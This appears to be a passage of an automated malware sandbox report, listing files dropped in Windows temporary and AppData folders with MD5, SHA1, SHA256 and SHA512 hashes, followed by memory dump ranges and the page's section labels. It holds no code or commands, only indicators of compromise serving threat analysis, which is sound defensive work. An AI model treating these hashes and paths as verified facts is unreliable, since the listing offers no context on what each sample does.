a3ec8c520620c0f9c8760f5c2c3ef6ab593240dc

SHA256
90fdd4ddf0f5700ed6e48ac33b5ede896a2d67e314fb48f6d948ab01b5c7ea4c

SHA512
780c1e8dce3e3f22dc820853bc18cadd969d7c1ce5a1bef52dbb09b3ae3c60b80116913c092760b9d50bda7857ff7de854e7b589106f3a2187697b76e3f1d7e7

Download Submit
\Users\Admin\AppData\Local\Temp\is-FJINV.tmp\_isetup\_shfoldr.dll
MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-FJINV.tmp\_isetup\_shfoldr.dll
MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-HACEN.tmp\Install2.tmp
MD5
45ca138d0bb665df6e4bef2add68c7bf

SHA1
12c1a48e3a02f319a3d3ca647d04442d55e09265

SHA256
3960a0597104fc5bbf82bf6c03564a1eb6a829c560d1f50d0a63b4772fafbe37

SHA512
cd1a0493c26798eb70b3dabb8a439de7792c4676905cad21c6b3f372213ce9f6b65648245defcd36d4f19285160f41c62e1025e772e6b9f11aa126388ea8364f

Download Submit
\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\Ultra.exe
MD5
cc2e3f1906f2f7a7318ce8e6f0f00683

SHA1
ff26f4b8ba148ddd488dde4eadd2412d6c288580

SHA256
0ed89ff238edaa1b5b084d5c3c7ba6864b59dac5a6fd961a9065e966f55b9cb2

SHA512
49d86be8794e0161bc2f2db626b9ce0031e9614486605f283c6cd8429fe9d907f3f3851d15cd318df5945ad2acac85da18f042f3692c38b794cc11d27b77a05a

Download Submit
\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\_isetup\_shfoldr.dll
MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\_isetup\_shfoldr.dll
MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-UI9Q3.tmp\idp.dll
MD5
8f995688085bced38ba7795f60a5e1d3

SHA1
5b1ad67a149c05c50d6e388527af5c8a0af4343a

SHA256
203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

SHA512
043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

Download Submit
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
MD5
858c99cc729be2db6f37e25747640333

SHA1
69070df2849c1373fae9a4b4a884f14fd8ae39f1

SHA256
d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

SHA512
f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

Download Submit
\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll
MD5
858c99cc729be2db6f37e25747640333

SHA1
69070df2849c1373fae9a4b4a884f14fd8ae39f1

SHA256
d4f839922c901906f549c687ccc58a010861a6a006a15c32e1a7f2e3d703b4d9

SHA512
f53e00bbedba0edbc363589a2be76ac836915b95d8e887bf5ee4080f34d773a19d9dd43e715569ea21f85a9434de2a16b51c52b00afd89d268bfc929e1e8e695

Download Submit
\Windows\Installer\MSIB666.tmp
MD5
07df9ca625c2cb953b2a7f7f699cee7c

SHA1
3225e84b51ba76eb650231c94231b70b70b997c9

SHA256
265d462e9bd3fc4bdf925590a852707a52e0707407fdc4ba40a468542e8dbb77

SHA512
104a32900ac3f7a3815ce4670aa430677eb48bd3b8a5e17f0a05c333b8faf776756408784c8191ea51ffd54ad52d7fcbf2611570a275efdc6bf1b04b5706f9fd

Download Submit
memory/308-60-0x0000000075A31000-0x0000000075A33000-memory.dmp

Filesize
8KB

Download
memory/308-61-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/368-72-0x0000000000000000-mapping.dmp

Download
memory/368-75-0x0000000001FC0000-0x0000000001FC2000-memory.dmp

Filesize
8KB

Download
memory/660-114-0x0000000000000000-mapping.dmp

Download
memory/868-97-0x0000000000000000-mapping.dmp

Download
memory/868-109-0x0000000002160000-0x0000000002162000-memory.dmp

Filesize
8KB

Download
memory/880-79-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/880-76-0x0000000000000000-mapping.dmp

Download
memory/1000-90-0x0000000000250000-0x0000000000251000-memory.dmp

Filesize
4KB

Download
memory/1000-82-0x0000000000000000-mapping.dmp

Download
memory/1000-87-0x0000000074D11000-0x0000000074D13000-memory.dmp

Filesize
8KB

Download
memory/1104-117-0x0000000001ED6000-0x0000000001EF5000-memory.dmp

Filesize
124KB

Download
memory/1104-107-0x000007FEF2760000-0x000007FEF37F6000-memory.dmp

Filesize
16.6MB

Download
memory/1104-103-0x0000000000000000-mapping.dmp

Download
memory/1104-110-0x0000000001ED0000-0x0000000001ED2000-memory.dmp

Filesize
8KB

Download
memory/1164-224-0x00000000001B0000-0x00000000001BC000-memory.dmp

Filesize
48KB

Download
memory/1164-216-0x0000000000000000-mapping.dmp

Download
memory/1264-239-0x0000000002A40000-0x0000000002A55000-memory.dmp

Filesize
84KB

Download
memory/1264-237-0x0000000002A10000-0x0000000002A27000-memory.dmp

Filesize
92KB

Download
memory/1324-311-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/1456-112-0x0000000000000000-mapping.dmp

Download
memory/1456-113-0x000007FEFC661000-0x000007FEFC663000-memory.dmp

Filesize
8KB

Download
memory/1928-108-0x00000000005C0000-0x00000000005C2000-memory.dmp

Filesize
8KB

Download
memory/1928-95-0x0000000000000000-mapping.dmp

Download
memory/1928-101-0x000007FEF2760000-0x000007FEF37F6000-memory.dmp

Filesize
16.6MB

Download
memory/1928-118-0x000000001B0E0000-0x000000001B0F9000-memory.dmp

Filesize
100KB

Download
memory/1928-120-0x00000000005C6000-0x00000000005E5000-memory.dmp

Filesize
124KB

Download
memory/1928-121-0x00000000005E5000-0x00000000005E6000-memory.dmp

Filesize
4KB

Download
memory/1984-70-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/1984-63-0x0000000000000000-mapping.dmp

Download
memory/2324-187-0x0000000000000000-mapping.dmp

Download
memory/2476-182-0x0000000000000000-mapping.dmp

Download
memory/2504-183-0x0000000000000000-mapping.dmp

Download
memory/2512-208-0x0000000000000000-mapping.dmp

Download
memory/2540-184-0x0000000000000000-mapping.dmp

Download
memory/2576-185-0x0000000000000000-mapping.dmp

Download
memory/2584-209-0x0000000000000000-mapping.dmp

Download
memory/2880-186-0x0000000000000000-mapping.dmp

Download
memory/2908-213-0x0000000000000000-mapping.dmp

Download
memory/3408-290-0x00000000045F2000-0x00000000045F3000-memory.dmp

Filesize
4KB

Download
memory/3408-289-0x00000000045F0000-0x00000000045F1000-memory.dmp

Filesize
4KB

Download
memory/3412-277-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/3412-278-0x00000000048C2000-0x00000000048C3000-memory.dmp

Filesize
4KB

Download
memory/3412-276-0x0000000000000000-mapping.dmp

Download
memory/3472-295-0x00000000047A0000-0x00000000047A1000-memory.dmp

Filesize
4KB

Download
memory/3472-296-0x00000000047A2000-0x00000000047A3000-memory.dmp

Filesize
4KB

Download
memory/3480-292-0x0000000002280000-0x0000000002ECA000-memory.dmp

Filesize
12.3MB

Download
memory/3508-297-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/3508-298-0x00000000049F2000-0x00000000049F3000-memory.dmp

Filesize
4KB

Download
memory/3708-196-0x0000000000000000-mapping.dmp

Download
memory/3736-197-0x0000000000000000-mapping.dmp

Download
memory/3812-199-0x0000000000000000-mapping.dmp

Download
memory/3832-200-0x0000000000000000-mapping.dmp

Download
memory/3880-201-0x0000000000000000-mapping.dmp

Download
memory/3896-202-0x0000000000000000-mapping.dmp

Download
memory/3944-206-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/3944-204-0x0000000000000000-mapping.dmp

Download
memory/3944-207-0x00000000002F0000-0x0000000000302000-memory.dmp

Filesize
72KB

Download
memory/3996-214-0x0000000000000000-mapping.dmp

Download
memory/4016-210-0x0000000000000000-mapping.dmp

Download
memory/4064-211-0x0000000000000000-mapping.dmp

Download
memory/4884-267-0x0000000000000000-mapping.dmp

Download
memory/4884-271-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/4884-269-0x0000000000C50000-0x0000000000C51000-memory.dmp

Filesize
4KB

Download
memory/4884-272-0x0000000004A32000-0x0000000004A33000-memory.dmp

Filesize
4KB

Download
memory/4944-180-0x0000000000000000-mapping.dmp

Download
memory/5064-273-0x0000000000000000-mapping.dmp

Download
memory/5080-274-0x0000000000000000-mapping.dmp

Download
memory/5104-275-0x0000000000000000-mapping.dmp

Download
memory/5664-140-0x0000000000000000-mapping.dmp

Download
memory/7556-131-0x0000000000000000-mapping.dmp

Download
memory/7628-133-0x0000000000000000-mapping.dmp

Download
memory/7628-137-0x0000000000140000-0x00000000001D0000-memory.dmp

Filesize
576KB

Download
memory/7712-265-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/7712-266-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/7712-258-0x0000000000000000-mapping.dmp

Download
memory/7712-264-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/7712-263-0x0000000002470000-0x00000000030BA000-memory.dmp

Filesize
12.3MB

Download
memory/7712-262-0x0000000002790000-0x0000000002791000-memory.dmp

Filesize
4KB

Download
memory/7712-261-0x0000000004C30000-0x0000000004C31000-memory.dmp

Filesize
4KB

Download
memory/7712-260-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/7724-136-0x0000000000000000-mapping.dmp

Download
memory/7808-174-0x0000000000000000-mapping.dmp

Download
memory/7816-248-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/7816-233-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/7816-238-0x0000000005260000-0x0000000005261000-memory.dmp

Filesize
4KB

Download
memory/7816-219-0x0000000000000000-mapping.dmp

Download
memory/7816-242-0x0000000006120000-0x0000000006121000-memory.dmp

Filesize
4KB

Download
memory/7816-247-0x0000000006200000-0x0000000006201000-memory.dmp

Filesize
4KB

Download
memory/7816-232-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/7816-255-0x0000000006340000-0x0000000006341000-memory.dmp

Filesize
4KB

Download
memory/7816-256-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/7816-257-0x0000000006700000-0x0000000006701000-memory.dmp

Filesize
4KB

Download
memory/7816-236-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/7816-235-0x0000000000D80000-0x0000000000E6D000-memory.dmp

Filesize
948KB

Download
memory/7816-234-0x0000000000D80000-0x0000000000E6D000-memory.dmp

Filesize
948KB

Download
memory/7824-221-0x0000000000402F68-mapping.dmp

Download
memory/7824-220-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/7908-223-0x0000000000000000-mapping.dmp

Download
memory/7908-229-0x0000000000400000-0x000000000045B000-memory.dmp

Filesize
364KB

Download
memory/7908-228-0x0000000000220000-0x0000000000229000-memory.dmp

Filesize
36KB

Download
memory/7924-179-0x0000000000000000-mapping.dmp

Download
memory/8048-230-0x0000000000000000-mapping.dmp

Download
memory/8260-147-0x0000000000000000-mapping.dmp

Download
memory/8364-122-0x0000000000000000-mapping.dmp

Download
memory/8524-293-0x0000000004840000-0x0000000004841000-memory.dmp

Filesize
4KB

Download
memory/8524-294-0x0000000004842000-0x0000000004843000-memory.dmp

Filesize
4KB

Download
memory/8532-128-0x0000000000270000-0x0000000000282000-memory.dmp

Filesize
72KB

Download
memory/8532-127-0x0000000000240000-0x0000000000250000-memory.dmp

Filesize
64KB

Download
memory/8532-124-0x0000000000000000-mapping.dmp

Download
memory/8708-154-0x0000000000000000-mapping.dmp

Download
memory/8760-158-0x0000000000000000-mapping.dmp

Download
memory/9028-166-0x0000000000000000-mapping.dmp

Download
memory/9172-217-0x0000000000000000-mapping.dmp

Download
memory/9208-218-0x0000000000000000-mapping.dmp

Download
memory/9348-279-0x0000000000000000-mapping.dmp

Download
memory/9348-280-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/9348-281-0x00000000048A2000-0x00000000048A3000-memory.dmp

Filesize
4KB

Download
memory/9456-299-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/9456-300-0x00000000049B2000-0x00000000049B3000-memory.dmp

Filesize
4KB

Download
memory/9564-303-0x0000000004B50000-0x0000000004B51000-memory.dmp

Filesize
4KB

Download
memory/9564-304-0x0000000004B52000-0x0000000004B53000-memory.dmp

Filesize
4KB

Download
memory/9576-301-0x0000000004A20000-0x0000000004A21000-memory.dmp

Filesize
4KB

Download
memory/9576-302-0x0000000004A22000-0x0000000004A23000-memory.dmp

Filesize
4KB

Download
memory/9588-282-0x0000000000000000-mapping.dmp

Download
memory/9588-284-0x0000000004A52000-0x0000000004A53000-memory.dmp

Filesize
4KB

Download
memory/9588-283-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/9612-307-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/9612-308-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/9684-306-0x000000001AD24000-0x000000001AD26000-memory.dmp

Filesize
8KB

Download
memory/9684-305-0x000000001AD20000-0x000000001AD22000-memory.dmp

Filesize
8KB

Download
memory/9688-195-0x0000000000000000-mapping.dmp

Download
memory/9712-194-0x0000000000000000-mapping.dmp

Download
memory/9796-188-0x0000000000000000-mapping.dmp

Download
memory/9844-189-0x0000000000000000-mapping.dmp

Download
memory/9908-287-0x00000000048D2000-0x00000000048D3000-memory.dmp

Filesize
4KB

Download
memory/9908-286-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/9908-285-0x0000000000000000-mapping.dmp

Download
memory/9920-312-0x0000000000160000-0x00000000001D4000-memory.dmp

Filesize
464KB

Download
memory/9920-313-0x00000000000F0000-0x000000000015B000-memory.dmp

Filesize
428KB

Download
memory/9932-314-0x0000000000330000-0x00000000003C1000-memory.dmp

Filesize
580KB

Download
memory/9984-309-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/10032-191-0x0000000000000000-mapping.dmp

Download
memory/10056-315-0x00000000000F0000-0x00000000000F7000-memory.dmp

Filesize
28KB

Download
memory/10068-192-0x0000000000000000-mapping.dmp

Download
memory/10096-310-0x0000000007070000-0x0000000007071000-memory.dmp

Filesize
4KB

Download
memory/10192-288-0x0000000000000000-mapping.dmp

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads